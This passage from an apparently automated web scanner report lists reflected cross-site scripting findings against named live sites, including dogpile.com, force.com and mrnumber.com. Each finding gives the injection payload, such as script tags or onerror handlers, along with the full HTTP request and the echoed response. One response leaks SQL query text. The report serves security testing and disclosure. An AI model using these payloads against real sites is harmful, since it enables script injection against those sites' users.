Set-Cookie: DomainSession=TransactionId=26f28f0af78442bc9f5bc16a3af0cb01&SessionId=d357b6175b6f40c6abe8c16a3af0cb01&PrevActionId=fc23be7bf89f4d2eac78c16a3af0cb01&ActionId=9aee2d8f1e244aa784bbc16a3af0cb01&CookieDomain=.dogpile.com1df86"-alert(1)-"c22c881b4b3; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:29:25 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:09:25 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 17:09:25 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 17:09:24 GMT
Connection: close
Vary: Accept-Encoding, User-Agent
Content-Length: 45841

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...
ansactionId=26f28f0af78442bc9f5bc16a3af0cb01&SessionId=d357b6175b6f40c6abe8c16a3af0cb01&PrevActionId=fc23be7bf89f4d2eac78c16a3af0cb01&ActionId=9aee2d8f1e244aa784bbc16a3af0cb01&CookieDomain=.dogpile.com1df86"-alert(1)-"c22c881b4b3; expires=Fri, 01 Apr 2011 17:29:25 GMT; domain=.dogpile.com; path=/";
}
window.onload=fix_cookies;
window.onfocus=fix_cookies;
//-->
...[SNIP]...

2.150. http://www.dogpile.com/info.dogpl.rss/web/GE+Zero+Taxes [DomainSession cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dogpile.com
Path:   /info.dogpl.rss/web/GE+Zero+Taxes

Issue detail

The value of the DomainSession cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ae01e"-alert(1)-"a0d5d5414f7 was submitted in the DomainSession cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /info.dogpl.rss/web/GE+Zero+Taxes HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:56:02 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; wsTemp=bigIP+3758658826.20480.0000+cacheId+ms18:1301676962746; wsRecent=MLB+Schedule,Web,Relevance,; wsViewRecent=1; DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=62fda6b6aa3440d49bc7c16a3af0cb01&ActionId=86d1546926784d5188d2c16a3af0cb01&CookieDomain=.dogpile.comae01e"-alert(1)-"a0d5d5414f7

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=86d1546926784d5188d2c16a3af0cb01&ActionId=18322850489c49eba441c16a3af0cb01&CookieDomain=.dogpile.comae01e"-alert(1)-"a0d5d5414f7; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:17:28 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:57:28 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:57:28 GMT; path=/
Set-Cookie: wsTemp=bigIP+3758658826.20480.0000+cacheId+ms18:1301677048693; path=/
Set-Cookie: wsRecent=GE+Zero+Taxes,Web,Relevance,&Go+Daddy+CEO+Elephant,Web,Relevance,&MLB+Schedule,Web,Relevance,; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:57:29 GMT
Connection: close
Vary: Accept-Encoding, User-Agent
Content-Length: 161046

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...
ansactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=86d1546926784d5188d2c16a3af0cb01&ActionId=18322850489c49eba441c16a3af0cb01&CookieDomain=.dogpile.comae01e"-alert(1)-"a0d5d5414f7; expires=Fri, 01 Apr 2011 17:17:28 GMT; domain=.dogpile.com; path=/";
}
window.onload=fix_cookies;
window.onfocus=fix_cookies;
//-->
...[SNIP]...

2.151. http://www.dogpile.com/info.dogpl.rss/web/Go+Daddy+CEO+Elephant [DomainSession cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dogpile.com
Path:   /info.dogpl.rss/web/Go+Daddy+CEO+Elephant

Issue detail

The value of the DomainSession cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6cfb5"-alert(1)-"011a7e5ee80 was submitted in the DomainSession cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /info.dogpl.rss/web/Go+Daddy+CEO+Elephant HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:55:44 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=91f95e6548a4490186bdc16a3af0cb01&ActionId=62fda6b6aa3440d49bc7c16a3af0cb01&CookieDomain=.dogpile.com6cfb5"-alert(1)-"011a7e5ee80

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=62fda6b6aa3440d49bc7c16a3af0cb01&ActionId=2f1882418dbe4e03a009c16a3af0cb01&CookieDomain=.dogpile.com6cfb5"-alert(1)-"011a7e5ee80; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:16:17 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:56:17 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:56:17 GMT; path=/
Set-Cookie: wsTemp=bigIP+3775436042.20480.0000+cacheId+ms19:1301676994415; path=/
Set-Cookie: wsRecent=Go+Daddy+CEO+Elephant,Web,Relevance,&MLB+Schedule,Web,Relevance,; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:56:18 GMT
Connection: close
Vary: Accept-Encoding, User-Agent
Content-Length: 162067

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...
ansactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=62fda6b6aa3440d49bc7c16a3af0cb01&ActionId=2f1882418dbe4e03a009c16a3af0cb01&CookieDomain=.dogpile.com6cfb5"-alert(1)-"011a7e5ee80; expires=Fri, 01 Apr 2011 17:16:17 GMT; domain=.dogpile.com; path=/";
}
window.onload=fix_cookies;
window.onfocus=fix_cookies;
//-->
...[SNIP]...

2.152. http://www.dogpile.com/info.dogpl.rss/web/MLB+Schedule [DomainSession cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dogpile.com
Path:   /info.dogpl.rss/web/MLB+Schedule

Issue detail

The value of the DomainSession cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2f96a"-alert(1)-"0cf0cd42d43 was submitted in the DomainSession cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /info.dogpl.rss/web/MLB+Schedule HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:55:44 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=91f95e6548a4490186bdc16a3af0cb01&ActionId=62fda6b6aa3440d49bc7c16a3af0cb01&CookieDomain=.dogpile.com2f96a"-alert(1)-"0cf0cd42d43

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=62fda6b6aa3440d49bc7c16a3af0cb01&ActionId=f112a8794f3b4673a292c16a3af0cb01&CookieDomain=.dogpile.com2f96a"-alert(1)-"0cf0cd42d43; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:16:19 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:56:19 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:56:19 GMT; path=/
Set-Cookie: wsTemp=bigIP+3808990474.20480.0000+cacheId+ms21:1301676996439; path=/
Set-Cookie: wsRecent=MLB+Schedule,Web,Relevance,&Go+Daddy+CEO+Elephant,Web,Relevance,; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:56:20 GMT
Connection: close
Vary: Accept-Encoding, User-Agent
Content-Length: 145894

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...
ansactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=62fda6b6aa3440d49bc7c16a3af0cb01&ActionId=f112a8794f3b4673a292c16a3af0cb01&CookieDomain=.dogpile.com2f96a"-alert(1)-"0cf0cd42d43; expires=Fri, 01 Apr 2011 17:16:19 GMT; domain=.dogpile.com; path=/";
}
window.onload=fix_cookies;
window.onfocus=fix_cookies;
//-->
...[SNIP]...

2.153. http://www.force.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.force.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 31872<script>alert(1)</script>9528ad1c941 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?31872<script>alert(1)</script>9528ad1c941=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.force.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 301 Moved Permanently
Server: SFDC
Location: http://www.salesforce.com/platform?31872<script>alert(1)</script>9528ad1c941=1
Date: Fri, 01 Apr 2011 15:29:52 GMT
Content-Length: 193

The URL has moved to <a href="http://www.salesforce.com/platform?31872<script>alert(1)</script>9528ad1c941=1">http://www.salesforce.com/platform?31872<script>alert(1)</script>9528ad1c941=1</a>

2.154. http://www.force.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.force.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e087"><script>alert(1)</script>f5d56d88177 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?9e087"><script>alert(1)</script>f5d56d88177=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.force.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 301 Moved Permanently
Server: SFDC
Location: http://www.salesforce.com/platform?9e087"><script>alert(1)</script>f5d56d88177=1
Date: Fri, 01 Apr 2011 15:29:51 GMT
Content-Length: 197

The URL has moved to <a href="http://www.salesforce.com/platform?9e087"><script>alert(1)</script>f5d56d88177=1">http://www.salesforce.com/platform?9e087"><script>alert(1)</script>f5d56d88177=1</a>

2.155. http://www.mercantila.com/website/shoppingcart/cartbroker.php [merc_uid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mercantila.com
Path:   /website/shoppingcart/cartbroker.php

Issue detail

The value of the merc_uid cookie is copied into the HTML document as plain text between tags. The payload b3c36<img%20src%3da%20onerror%3dalert(1)>bd9912f2169 was submitted in the merc_uid cookie. This input was echoed as b3c36<img src=a onerror=alert(1)>bd9912f2169 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

POST /website/shoppingcart/cartbroker.php HTTP/1.1
Host: www.mercantila.com
Proxy-Connection: keep-alive
Referer: http://www.mercantila.com/
Content-Length: 22
Origin: http://www.mercantila.com
X-Prototype-Version: 1.6.0
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-type: application/x-www-form-urlencoded; charset=UTF-8
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mercServeBucket=merc-resources-gzip; mercServeCloud=dklnxffcpkmhm; PHPSESSID=1191364907574890868; merc_uid=6451364907577995808b3c36<img%20src%3da%20onerror%3dalert(1)>bd9912f2169; __utmz=1.1301677342.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.940387525.1301677342.1301677342.1301677342.1; __utmc=1; __utmb=1.1.10.1301677342

Action=getCartCount&_=

Response

HTTP/1.1 200 OK
Date: Fri, 01 Apr 2011 17:02:41 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 997
Content-Type: text/html; charset=UTF-8

{"marr_data":"Error in query executionSELECT\r\n internal_code as INTERNAL_CODE, ref_product_id as REF_PRODUCT_ID, relation_type as RELATION_TYPE,\r\n quantity as
...[SNIP]...
s\r\n WHERE\r\n ref_cart_id = {\"marr_data\":\"Error in query executionSELECT internal_code, status FROM maya_cart WHERE status = 0 AND user_id = 6451364907577995808b3c36<img src=a onerror=alert(1)>bd9912f2169\",\"marr_request_param\":null,\"mint_status_code\":0,\"mstr_status_message\":null} \r\n ORDER BY\r\n internal_code","marr_request_param":null,"mint_status_code":0,"
...[SNIP]...

2.156. http://www.mrnumber.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mrnumber.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 85bf8<script>alert(1)</script>c6dc492760e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico85bf8<script>alert(1)</script>c6dc492760e HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mrnumber.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.0 302 Found
Location: http://mrnumber.com/favicon.ico85bf8<script>alert(1)</script>c6dc492760e
Content-Type: text/html
Content-Length: 262

<html><head><title>Redirect</title></head><body><h1>Redirect</h1><p>You should go to <a href="http://mrnumber.com/favicon.ico85bf8<script>alert(1)</script>c6dc492760e">http://mrnumber.com/favicon.ico85bf8<script>alert(1)</script>c6dc492760e</a>
...[SNIP]...

2.157. http://www.mrnumber.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mrnumber.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8fff9"><script>alert(1)</script>496210cd2cd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico8fff9"><script>alert(1)</script>496210cd2cd HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mrnumber.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.0 302 Found
Location: http://mrnumber.com/favicon.ico8fff9"><script>alert(1)</script>496210cd2cd
Content-Type: text/html
Content-Length: 266

<html><head><title>Redirect</title></head><body><h1>Redirect</h1><p>You should go to <a href="http://mrnumber.com/favicon.ico8fff9"><script>alert(1)</script>496210cd2cd">http://mrnumber.com/favicon.ic
...[SNIP]...

2.158. http://www.mrnumber.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mrnumber.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 593b7"><script>alert(1)</script>9834e7cd796 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?593b7"><script>alert(1)</script>9834e7cd796=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mrnumber.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.0 302 Found
Location: http://mrnumber.com/favicon.ico?593b7"><script>alert(1)</script>9834e7cd796=1
Content-Type: text/html
Content-Length: 272

<html><head><title>Redirect</title></head><body><h1>Redirect</h1><p>You should go to <a href="http://mrnumber.com/favicon.ico?593b7"><script>alert(1)</script>9834e7cd796=1">http://mrnumber.com/favicon
...[SNIP]...

2.159. http://www.mrnumber.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mrnumber.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e0fda<script>alert(1)</script>79f53615157 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?e0fda<script>alert(1)</script>79f53615157=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mrnumber.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.0 302 Found
Location: http://mrnumber.com/favicon.ico?e0fda<script>alert(1)</script>79f53615157=1
Content-Type: text/html
Content-Length: 268

<html><head><title>Redirect</title></head><body><h1>Redirect</h1><p>You should go to <a href="http://mrnumber.com/favicon.ico?e0fda<script>alert(1)</script>79f53615157=1">http://mrnumber.com/favicon.ico?e0fda<script>alert(1)</script>79f53615157=1</a>
...[SNIP]...

2.160. http://www.opinionoutpost.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opinionoutpost.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bcb49"><script>alert(1)</script>22543bfa152 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.icobcb49"><script>alert(1)</script>22543bfa152 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.opinionoutpost.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.0 302 This object has moved
Content-type: text/html
Content-Length: 269
Location: https://www.opinionoutpost.com:443/favicon.icobcb49"><script>alert(1)</script>22543bfa152

<html><head><title>302 - This object has moved</title></head>
<body>
<h1>302: This object has moved</h1>
<b><p>Please click <A HREF="https://www.opinionoutpost.com:443/favicon.icobcb49"><script>alert(1)</script>22543bfa152">
...[SNIP]...

2.161. http://www.opinionoutpost.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opinionoutpost.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d57c0"><script>alert(1)</script>ecafb33f606 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?d57c0"><script>alert(1)</script>ecafb33f606=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.opinionoutpost.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.0 302 This object has moved
Content-type: text/html
Content-Length: 272
Location: https://www.opinionoutpost.com:443/favicon.ico?d57c0"><script>alert(1)</script>ecafb33f606=1

<html><head><title>302 - This object has moved</title></head>
<body>
<h1>302: This object has moved</h1>
<b><p>Please click <A HREF="https://www.opinionoutpost.com:443/favicon.ico?d57c0"><script>alert(1)</script>ecafb33f606=1">
...[SNIP]...

2.162. http://www.rateyourmusic.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rateyourmusic.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 933fb"><script>alert(1)</script>1ea6fc7b15e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico933fb"><script>alert(1)</script>1ea6fc7b15e HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.rateyourmusic.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 302 Found
Location: http://rateyourmusic.com/favicon.ico933fb"><script>alert(1)</script>1ea6fc7b15e
MIME-Version: 1.0
Date: Fri, 01 Apr 2011 15:57:55 GMT
Server: AOLserver/4.5.0
Content-Type: text/html; charset=utf-8
Content-Length: 357
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML>
<HEAD>
<TITLE>Redirection</TITLE>
</HEAD>
<BODY>
<H2>Redirection</H2>
<A HREF="http://rateyourmusic.com/favicon.ico933fb"><script>alert(1)</script>1ea6fc7b15e">
...[SNIP]...

2.163. http://www.rateyourmusic.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rateyourmusic.com
